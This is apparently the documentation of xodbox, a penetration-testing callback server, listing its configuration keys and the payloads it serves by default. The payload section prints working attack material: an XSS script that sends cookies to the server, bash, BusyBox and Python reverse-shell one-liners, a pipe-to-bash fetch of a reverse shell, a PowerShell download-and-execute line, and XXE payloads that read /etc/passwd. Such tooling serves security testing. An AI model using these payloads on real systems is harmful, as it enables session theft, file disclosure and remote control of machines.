HTTPX
HTTPX Handler
Purpose
Speak HTTP to other computers you may or may not control….
Configuration
| Key | Values |
|---|
| handler | Must be HTTPX |
| listener | Default :80 |
| static_dir | Directory to host static files from |
| payload_dir | Directory to import payloads from |
| acme_email | Email to use for your ACME account |
| acme_accept | A dumb way to force you to ensure you agree to the ACME provider’s (Most likely Let’s Encrypt) TOS |
| acme_url | https://acme-staging-v02.api.letsencrypt.org/directory, https://acme-v02.api.letsencrypt.org/directory, or one of these: Certmagic acmeissuer.go |
| tls_names | Your domains to get TLS certificates for comma separated. I had to do wildcards first, not sure if that was a staging or dns provider issue. |
| dns_provider | Currently, namecheap or route53 but we can support anything libdns supports… |
| dns_provider_api_user | Username for API calls. Only used for namecheap ATM. |
| dns_provider_api_key | Key for API calls. Only used for namecheap ATM. |
| mdaas_log_level | Log level for MDaaS binaries. Possible values NONE, INFO, WARN, ERROR, DEBUG |
| mdaas_bind_listener | Listener for MDaaS Binaries. |
| mdaas_allowed_cidr | CIDRs allowed to connect to MDaaS binaries |
| mdaas_notify_url | Webhook URL for notifying success or err |
| api_path | API Path |
Filters
The entire HTTP request is used to match filters. To alert on a specific prefix the following filter would be used.
"(GET|POST|HEAD|DELETE|PUT|PATCH|TRACE) /myPrefix"
This would match:
And would not match:
Things are still being created, documented, and fine-tuned.
New Features
Legacy Functionality to be implemented.
Legacy functionality that isnt specific to a handler
1 - Default Payloads Seeds
seed data
Default payloads that come with xodbox.
1.1 - Default Header
Adds the default header to all HTTP responses.
Adds an HTTP header to all HTTP responses.
Example Request
curl -i http://xodbox.test/
Example Response
Server: BreakfastBot/1.0.0
1.2 - Redirect
HTTP Redirects
HTTP Redirects to the query parameter l using the query param s as the status code.
| What | Description | GET Parameters |
|---|
| Location | Location to redirect to | l |
| Status | HTTP status code | s |
Example Request
curl -i "http://xodbox.test/redir?l=https://github.com/defektive/xodbox&s=301"
Example Response
Location: https://github.com/defektive/xodbox
1.3 - Remote Address Reflector
A restrictive robots.txt
Simple robots txt to prevent indexing.
Example Request
curl http://xodbox.test/ip
Example Response
1.4 - Robots TXT
A restrictive robots.txt
Simple robots txt to prevent indexing.
Example Request
curl http://xodbox.test/robots.txt
Example Response
User-Agent: *
Disallow: /
1.5 - Build MDaaS
Build random binaries
1.6 - Inspect
Reflect back HTTP requests in various formats
Depends on an internal code
/inspect
Inspect or reflect the request back in various formats.
Examples
- http://localhost/inspect
- http://localhost/some/random/path/inspect.gif
1.7 - XSS HTML
Returns HTML that embeds xss-js
/jsc.html
Simple HTML to load simple JS Payload.
1.8 - XSS JavaScript
Returns JS that embeds an image back to xodbox
/jsc
Simple JS Payload. Useful form embedding or quickly copying and modifying for an XSS payload to prove execution and
exfil.
(function (){
var s = document.createElement("img");
document.body.appendChild(s);
s.src="//{{.Request.Host}}/{{ .NotifyString}}/jscb?src="+window.location+"&c="+document.cookie;
})()
1.9 - Default Favicon
Redirects to the default logo.
Redirects to the embedded default logo, exposed via embedded fs.
Example Request
curl -i http://xodbox.test/favicon.ico
1.10 - Bash Reverse Shell
BusyBox Reverse Shell
Useful for reverse shells on busybox systems.
Example Request
Params
| Parameter | Default Value | Description |
|---|
| h | Client IP address | Host to connect to |
| p | 9091 | Port to connect to |
curl -i "http://xodbox.test/rsh/bash?h=10.10.10.10&p=9090"
Example Response
bash -i >& /dev/tcp/127.0.0.1/9091 0>&1
0<&196;exec 196<>/dev/tcp/127.0.0.1/9091 ; sh <&196 >&196 2>&196
/bin/bash -l > /dev/tcp/127.0.0.1/9091 0<&1 2>&1
1.11 - Bind Shell
Requires bind-shell in static dir
Build a bind shell implant for the specific platform and execute it.
Example Request
1.12 - BusyBox Reverse Shell
BusyBox Reverse Shell
Useful for reverse shells on busybox systems.
Example Request
Params
| Parameter | Default Value | Description |
|---|
| h | Client IP address | Host to connect to |
| p | 9091 | Port to connect to |
curl -i "http://xodbox.test/rsh/bb?h=10.10.10.10&p=9090"
Example Response
rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1111 >/tmp/f
1.13 - Detect platform
detect platform
Example Request
curl -i "http://xodbox.test/detect.sh"
This will curl the notification url with the detected values in the path.
1.14 - HTML IFrame With Request Params
Returns an HTML page with an iframe src to f query parameter
/ht
attempts to get whatever files is supplied via the f query parameter
1.15 - Open Graph
Embed request params in open graph elements.
Useful for unfurlers. Maybe we should merge this into inspect…
Example Request
curl -i "http://xodbox.test/unfurl"
Example Response
Location: https://github.com/defektive/xodbox
1.16 - Python Reverse Shell
Python Reverse Shell
Useful for reverse shells on busybox systems.
Example Request
Params
| Parameter | Default Value | Description |
|---|
| h | Client IP address | Host to connect to |
| p | 9091 | Port to connect to |
curl -i "http://xodbox.test/rsh/python?h=10.10.10.10&p=9090"
Example Response
import socket,os,pty;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("127.0.0.1",9091));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
pty.spawn("/bin/sh")
1.17 - Reverse Shell
Requires bind-shell in static dir
Build a reverse shell implant for the specific platform and execute it.
Example Request
curl xodbox/reverse.sh|bash
1.18 - Simple SSH
Simple SSH (requires build of simple ssh server in static dir)
Build an SSH server implant for the specific platform and execute it.
Example Request
1.19 - Simple SSH Service
Simple SSH Service (requires build of simple ssh server in static dir)
Build an SSH server implant for the specific platform and install it as a service, then start the service.
Example Request
1.20 - XSS Image Template
A text template for quickly embedding js execution hooks into pages the image tags
1.21 - XXE Callback
More XXE
XXE Callback used by xxe-system
1.22 - XXE DTD
More XXE
/dt
A vulnerable application for testing is in ../../../../cmd/xodbox-validator
/evil.dtd
dtd for use by others
1.23 - XXE SVG Hostname
Returns an SVG payload with XXE to get files
/sh
attempts to get /etc/hostname
SVG with XXE payloads
1.24 - XXE SVG Passwd
Returns an SVG payload with XXE to get files
/sp
attempts to get /etc/passwd
1.25 - XXE SVG Request Params
Returns an SVG payload with XXE to get files
/sv
attempts to get whatever files is supplied via the f query parameter
1.26 - XXE System
More XXE
/dt
A vulnerable application for testing is in ../../../../cmd/xodbox-validator
1.27 - Default Page
returns a simple page if nothing is matched
Adds an HTTP header to all HTTP responses.
Example Request
curl -i http://xodbox.test/
Example Response
1.28 - In Development Seeds
These seeds are not ready for production and may never be.
Seeds that are not tested or finished.
1.28.1 - Bind shell powershell
Requires bind-shell in static dir
iex ((New-Object System.Net.WebClient).DownloadString('http://xobox/bind.ps1'))
1.28.2 - Pipe Process List to Notifier
Simple script to pipe ps to the notification URL
Example Request
1.28.3 - WPAD
Returns a WPAD config file (Javascript).
WPAD Proxy. Not really useful at the moment. Should be more useful in the future
2 - Example Payloads
Examples
Default payloads that come with xodbox.
2.1 - List Payloads
List payloads
List Payloads
---
title: List Payloads
description: List payloads
weight: 1
pattern: /i-forgot-how-things-work$
is_final: true
data:
headers:
Content-Type: text/plain
body: |
Payloads
{{ range .Payloads }}
{{ .Pattern }} - {{ .Name }} [{{ .Type }}]
{{ .Description }}
{{ end }}
---